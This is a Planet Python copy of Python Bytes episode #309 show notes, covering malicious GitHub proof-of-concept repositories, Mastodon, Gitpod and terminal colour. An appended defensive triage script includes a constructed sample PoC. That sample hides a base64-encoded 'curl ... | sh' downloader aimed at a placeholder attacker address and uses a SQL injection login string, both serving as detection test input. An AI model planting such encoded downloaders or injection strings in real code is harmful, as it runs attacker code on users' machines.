Channel: Planet Python

Python Bytes: #309 When Malware PoC's are Themselves Malware

<p><strong>Watch the live stream:</strong></p>
<a href='https://www.youtube.com/watch?v=xxN5Zjf-J1E' style='font-weight: bold;'>Watch on YouTube</a><br>
<br>
<p><strong>About the show</strong></p>
<p>Sponsored by <a href="http://pythonbytes.fm/foundershub2022"><strong>Microsoft for Startups Founders Hub</strong></a>.</p>
<p><strong>Michael: #0: Python Bytes is 6 years</strong> old this week. Thank you! 🎉</p>
<p><strong>Michael #1:</strong> <a href="https://portswigger.net/daily-swig/malicious-proof-of-concepts-are-exposing-github-users-to-malware-and-more"><strong>Malicious proof-of-concepts are exposing GitHub users to malware and more</strong></a></p>
<ul>
<li><a href="https://arxiv.org/abs/2210.08374"><strong>The paper</strong></a></li>
<li>They found that of the 47,313 GitHub repositories they had downloaded and checked, 4,893 (10.3%) were malicious.</li>
<li>In some, the attackers were trying to plant malware on users’ machines, while in others they tried to open backdoors using Cobalt Strike, for example.</li>
<li>“Ignoring this problem can cause damage that ranges from infecting yourself as [a] user, to infecting your company and likely your customers as well if it’s a more sophisticated attack,” El Yadmani warned.</li>
<li>Languages
<ul>
<li>Ruby 379</li>
<li>Go 400</li>
<li>JavaScript 548</li>
<li>Shell 652</li>
<li>C++ 962</li>
<li>Java 1071</li>
<li>C 1686</li>
<li><strong>Python 8305</strong></li>
<li>Undetected 31858</li>
</ul></li>
<li>Example Python exfil script included in the paper</li>
</ul>
<p><strong>Brian #2:</strong> <strong>The great Mastodon experiment</strong></p>
<ul>
<li>Context should be obvious re Twitter news.</li>
<li>A lot of Python people have kept in touch via Twitter.</li>
<li>A lot are now experimenting with <a href="https://joinmastodon.org">Mastodon</a>.</li>
<li>What I did
<ul>
<li>asked Twitter people which server to use, then just picked fosstodon.org, but there are <a href="https://joinmastodon.org/servers">many servers</a></li>
<li>This is me: <a href="https://fosstodon.org/@brianokken"><strong>@brianokken@fosstodon.org</strong></a></li>
<li>Michael got in too: <strong>https://fosstodon.org/@mkennedy</strong></li>
<li>just started using it, following people, trying iOS clients, etc.</li>
</ul></li>
<li>Now I’m ready for some tutorials, and here’s a list that looks decent:
<ul>
<li><a href="https://github.com/joyeusenoelle/GuideToMastodon?utm_source=pocket_saves">An Increasingly Less-Brief Guide to Mastodon</a></li>
<li><a href="https://blog.djnavarro.net/posts/2022-11-03_what-i-know-about-mastodon/#etiquette-on-cross-posting-from-twitter">Everything I know about Mastodon</a>
<ul>
<li>A hastily written guide for data science folks trying to navigate the fediverse.</li>
</ul></li>
<li><a href="https://simonwillison.net/2022/Nov/8/mastodon-is-just-blogs/">Mastodon is just blogs</a> - Simon Willison is running his own server.</li>
<li><a href="https://transponderings.blog/2022/05/21/eight-mastodon-apps-for-iphone/">Eight Mastodon apps for iPhone</a> - I’m currently trying like 4, but you can also just log into your server and do everything there.</li>
<li><a href="https://fedi.tips">Fedi.Tips</a> and their <a href="https://fedi.tips/mastodon-and-the-fediverse-beginners-start-here/">Beginners Start Here</a> page</li>
</ul></li>
</ul>
<p><strong>Michael #3:</strong> <a href="https://twitter.com/titimoby/status/1585566185961263104?s=12&amp;t=4h7RIi-8kG9bjNWYyonA4Q"><strong>Gitpod and the traveling dev</strong></a></p>
<ul>
<li>Gitpod is an open-source Kubernetes application for ready-to-code developer environments that spins up fresh, automated dev environments for each task, in the cloud, in seconds.</li>
<li>Gitpod is paid, but there are decent free tiers.</li>
<li><a href="https://github.com/gitpod-io/gitpod#features">Features</a></li>
<li>Run a desktop or browser based version of VS Code or any JetBrains IDE and customise it to your individual needs - from themes to extensions, you have full control.</li>
</ul>
<p><strong>Brian #4:</strong> <strong>Color in the terminal</strong></p>
<ul>
<li>pytest-check currently doesn’t use color
<ul>
<li>but a little red for failures would be good (and was requested via an issue)</li>
</ul></li>
<li>I could use <a href="https://pypi.org/project/rich/">rich</a>, but maybe that’s a slightly larger hammer than I need for this job.</li>
<li>Maybe raw escape sequences like <code>print('\033[31m' + 'some red text')</code>
<ul>
<li>kinda gross</li>
<li>won’t work out of the box on Windows.</li>
</ul></li>
<li>But <a href="https://pypi.org/project/colorama/">colorama</a> can fix Windows.
<ul>
<li>It just recently added <code>just_fix_windows_console()</code>, which apparently works better than <code>init()</code> in that it can be called multiple times without blowing up.</li>
<li>Includes easier to read codes for some basic colors, so this works:
<pre><code>from colorama import just_fix_windows_console
from colorama import Fore, Style

# Make the Windows console understand ANSI escape codes; a no-op elsewhere
# and safe to call more than once.
just_fix_windows_console()

print(Fore.RED + 'some red text')
print(Style.RESET_ALL)  # clear colour and style so later output is unaffected
print('back to normal now')
</code></pre></li>
</ul></li>
</ul>
<p><strong>Extras</strong></p>
<p>Brian:</p>
<ul>
<li>Simon Willison wrote <a href="https://simonwillison.net/2022/Nov/6/what-to-blog-about/?utm_source=pocket_saves">What to blog about</a>, which includes
<ul>
<li>TIL (today I learned) posts that don’t need to be full tutorials</li>
<li>Projects you’ve built</li>
</ul></li>
<li>I’d like to include
<ul>
<li>Projects in progress</li>
<li>Bug fixes or feature additions where you needed to learn a bit of something beforehand
<ul>
<li>Example: I should write up “Adding red to pytest-check”</li>
</ul></li>
</ul></li>
</ul>
<p>Michael:</p>
<ul>
<li>Beanie reorg: There is no sync version here anymore. Please use <a href="https://github.com/roman-right/bunnet">Bunnet</a> instead.</li>
<li>https://twitter.com/nicholdav/status/1589643652598759424 ?</li>
<li><a href="https://twitter.com/mariatta/status/1589656718635839488"><strong>PyCon Days Breakdown</strong></a></li>
<li>Been playing with GeForce Now, really impressive. Meanwhile, why is Google still selling Stadia?</li>
<li>New video: <a href="https://www.youtube.com/watch?v=kmAe3VUW3zU"><strong>A Walrus Meets a Python - What is the := Walrus Operator?</strong></a></li>
<li>New video: <a href="https://www.youtube.com/watch?v=p4Sn6UcFTOU"><strong>Python GC Settings - Change This and Go 20% Faster!</strong></a></li>
</ul>
<p><strong>Joke:</strong> <a href="https://devhumor.com/media/pure-relaxation-server-sounds"><strong>Relaxation</strong></a></p>
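<p><strong>Added example for Michael #1 (not from the show, the Daily Swig article or the paper):</strong> a first-pass static triage to run over a downloaded PoC before anyone executes it. This is hypothetical helper code written for these notes; the indicator list, the <code>LOCAL_NETS</code> allow-list and the sample PoC are all assumptions, not the paper's tooling. It flags hard-coded IP addresses outside the lab ranges, long base64/hex runs that decode to readable text, and <code>exec()</code>/<code>eval()</code> fed straight from a decoder call, and it re-scans decoded payloads for addresses, which is how the planted downloader in the constructed sample surfaces even though the only plaintext IP in the file is the loopback target.</p>

```python
"""Static triage of a downloaded PoC before running it.

Hypothetical helper written for these show notes, not the paper's tooling or
any project's code. Three cheap indicators: hard-coded IPv4 literals outside
the lab ranges, long base64/hex runs that decode to readable text, and
exec()/eval() whose argument comes straight from a decoder.
"""
import ast
import base64
import binascii
import ipaddress
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
HEX_RE = re.compile(r"\b(?:[0-9a-fA-F]{2}){20,}\b")

# Ranges a PoC legitimately targets (your own lab box). Assumed allow-list.
# Documentation ranges such as 203.0.113.0/24 are deliberately NOT excluded,
# so the constructed sample below, which uses one in place of a real attacker
# host, still trips the check.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "255.255.255.255/32")]
DECODERS = {"b64decode", "b32decode", "b16decode", "fromhex", "unhexlify", "decompress"}


def remote_ips(text):
    """Sorted unique IPv4 literals in text that fall outside LOCAL_NETS."""
    found = set()
    for lit in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(lit)
        except ValueError:  # e.g. 999.1.2.3 matches the regex but is not an address
            continue
        if not any(ip in net for net in LOCAL_NETS):
            found.add(str(ip))
    return sorted(found)


def decoded_blobs(text):
    """(encoding, decoded_text) for base64/hex runs that decode to printable ASCII."""
    decoders = (("base64", B64_RE, lambda s: base64.b64decode(s, validate=True)),
                ("hex", HEX_RE, bytes.fromhex))
    out = []
    for name, rx, fn in decoders:
        for blob in rx.findall(text):
            try:
                raw = fn(blob)
            except (binascii.Error, ValueError):
                continue  # a long identifier or hash, not a real encoding
            if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
                out.append((name, raw.decode("ascii")))
    return out


def _callee(call):
    """Name a Call node invokes: 'b64decode' for base64.b64decode(...) and b64decode(...)."""
    f = call.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", None)


def exec_from_decoder(src):
    """Line numbers of exec()/eval() calls whose arguments contain a decoder call."""
    hits = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call) and _callee(node) in ("exec", "eval"):
            if any(isinstance(sub, ast.Call) and _callee(sub) in DECODERS
                   for arg in node.args for sub in ast.walk(arg)):
                hits.append(node.lineno)
    return hits


def audit(src):
    """List of (kind, detail) findings for one PoC source file; [] means nothing flagged."""
    findings = [("remote_ip", ip) for ip in remote_ips(src)]
    for enc, text in decoded_blobs(src):
        findings.append(("encoded_payload", f"{enc}: {text[:60]}"))
        findings.extend(("remote_ip_in_payload", ip) for ip in remote_ips(text))
    findings.extend(("exec_of_decoded", f"line {n}") for n in exec_from_decoder(src))
    return findings


# Constructed sample, not a real repository: a plausible-looking web "exploit"
# whose setup step actually runs an encoded downloader. 203.0.113.10 is a
# documentation address standing in for the attacker; 127.0.0.1 is the lab target.
_PAYLOAD = 'import os; os.system("curl -s http://203.0.113.10/x.sh | sh")'
SAMPLE_POC = f'''
import base64, requests

TARGET = "http://127.0.0.1:8080/login"

def setup():
    # "dependency check"
    exec(base64.b64decode("{base64.b64encode(_PAYLOAD.encode()).decode()}"))

def exploit(target=TARGET):
    return requests.post(target, data={{"user": "admin'--", "pass": "x"}})

if __name__ == "__main__":
    setup()
    exploit()
'''

if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_POC):
        print(f"{kind:22} {detail}")
```

<p>A hit is a reason to read the file, not proof of malice: legitimate PoCs embed shellcode as hex and call out to the target by address. Run the triage in the same throwaway VM you would use for the PoC itself, and note that binaries and non-Python files in the repository are out of scope for this script.</p>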
